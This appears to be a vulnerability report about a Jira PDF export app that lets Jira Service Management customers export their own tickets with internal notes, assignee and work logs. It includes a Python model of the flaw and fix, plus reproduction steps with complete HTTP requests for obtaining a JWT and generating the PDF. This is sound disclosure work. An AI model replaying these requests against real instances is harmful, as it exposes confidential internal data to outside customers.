JSM customers can get internal notes via the app
Description
The app is available to JSM customers. The app allows exporting an issue only when a user has access to the issue, and this is controlled using a document id claim in the JWT. However, since JSM customers have access to their JSM tickets, they can export tickets with all information. Some information is not available to customers via portals, for example:
- internal notes
- assignee
- work logs
- attachments (though via the app customers can get only attachment names)
The most important information is internal notes that can contain information not intended to be available to customers.
I believe that access to the app must be forbidden for JSM customers.
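As an added example (not the app's or Atlassian's code), the Python below models the reported gap and the proposed fix: the export path gates only on issue access, which a JSM customer has for their own tickets, while the fixed path refuses portal customers outright and, as a second layer, renders only the fields the requester's role may see. The data model, the role flags and the sample ticket are constructed assumptions.

```python
from dataclasses import dataclass

@dataclass
class Comment:
    body: str
    internal: bool  # True for a JSM internal note, False for a customer-visible reply

@dataclass
class Issue:
    summary: str
    assignee: str
    comments: list
    worklogs: list
    attachments: list

@dataclass
class Requester:
    can_view_issue: bool      # what the document-id claim in the JWT establishes
    is_portal_customer: bool  # JSM customer account rather than an agent

def export_vulnerable(issue, requester):
    """Reported behaviour: the only gate is issue access, which a customer has."""
    if not requester.can_view_issue:
        raise PermissionError("no access to issue")
    return render_for_role(issue, agent=True)  # always the full agent view

def export_allowed(requester):
    """Policy from the report: issue access alone is not enough; customers are refused."""
    return requester.can_view_issue and not requester.is_portal_customer

def export_fixed(issue, requester):
    if not export_allowed(requester):
        raise PermissionError("export refused for this requester")
    return render_for_role(issue, agent=True)

def render_for_role(issue, agent):
    """Second layer: render only what the role may see (customer view drops internals)."""
    doc = {"summary": issue.summary,
           "comments": [c.body for c in issue.comments if agent or not c.internal]}
    if agent:
        doc.update(assignee=issue.assignee, worklogs=list(issue.worklogs),
                   attachments=list(issue.attachments))
    return doc

# Constructed sample data (not real ticket content) for the checks below.
SAMPLE_ISSUE = Issue("Printer is offline", "agent@example.test",
                     [Comment("We are looking into it.", internal=False),
                      Comment("Customer is on a trial, do not escalate.", internal=True)],
                     worklogs=["30m"], attachments=["screenshot.png"])
CUSTOMER, AGENT = Requester(True, True), Requester(True, False)  # (can_view_issue, is_portal_customer)
```

Rendering the PDF through `render_for_role` rather than from the full issue keeps internal notes out of the document even if the role check is ever bypassed.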
Steps to reproduce:
1. Log in as admin, enable Jira Service Management if it is not enabled
2. Go to https://<VICTIM_INSTANCE>.atlassian.net/servicedesk in an incognito browser (the attacker's browser) and sign up
3. Confirm email to complete sign up
4. Create any request on the JSM portal
5. Go to requests history and find there a POST request to /servicedesk/customer/portal/<PORTAL_ID>/create/<ID>, from the response get the created issue id (issue -> id)
6. As the admin open the customer's ticket in Jira and add an internal note (select it in the comments section)
7. Send the request below with the issue id from step 5, your subdomain and the attacker's customer cookie:

POST /plugins/servlet/ac/pdf-export-jira/issue-dialog HTTP/2
Host: <YOUR_INSTANCE>.atlassian.net
Cookie: <COOKIE>
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

plugin-key=pdf-export-jira&product-context=%7B%22issue.id%22%3A%22<ISSUE_ID>%22%7D&key=issue-dialog&width=100%25&height=100%25&classifier=json

8. Get the url value from the response, open it, and get the value of the input element with name jwt from the page HTML source code.
9. Send the request below with the JWT from the page source code:

POST /pdf-export-jira/create-pdf HTTP/2
Host: contract-signatures.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1564

jwt=<JWT>&layout.json=%7B%22paper-size%22%3A%22A4%22%2C%22margin%22%3A%2220mm%22%2C%22gap%22%3A%2210mm%22%2C%22font-family%22%3A%22deja-vu-sans%22%2C%22font-size%22%3A%2210pt%22%2C%22line-height%22%3A%221.2%22%2C%22letter-spacing%22%3A%220%22%2C%22color%22%3A%22%23112244%22%2C%22sections%22%3A%5B%5B%22breadcrumbs%22%2C%22summary%22%2C%22site%22%2C%22labels%22%5D%2C%5B%22status%22%2C%22issue-type%22%2C%7B%22type%22%3A%22last-history-entries%22%2C%22limit%22%3A%2230%22%7D%2C%22reporter%22%2C%22created%22%2C%22original-estimate%22%5D%2C%5B%22resolution%22%2C%22priority%22%2C%22assignee%22%2C%22updated%22%2C%22time-tracking%22%2C%7B%22type%22%3A%22last-comments%22%2C%22limit%22%3A%2230%22%7D%5D%2C%5B%22description%22%2C%22subtasks%22%2C%22linked-issues%22%2C%22remote-links%22%2C%7B%22type%22%3A%22attachments%22%2C%22sort-by%22%3A%22created-desc%22%7D%5D%5D%7D

10. Get the value of the meta tag with name taskId from the response and open the url below with this task id and the JWT:
https://contract-signatures.com/pdf-export-jira/download-pdf?taskId=<TASK_ID>&jwt=<JWT>
11. You will get a pdf file with information not available to customers, including the internal note.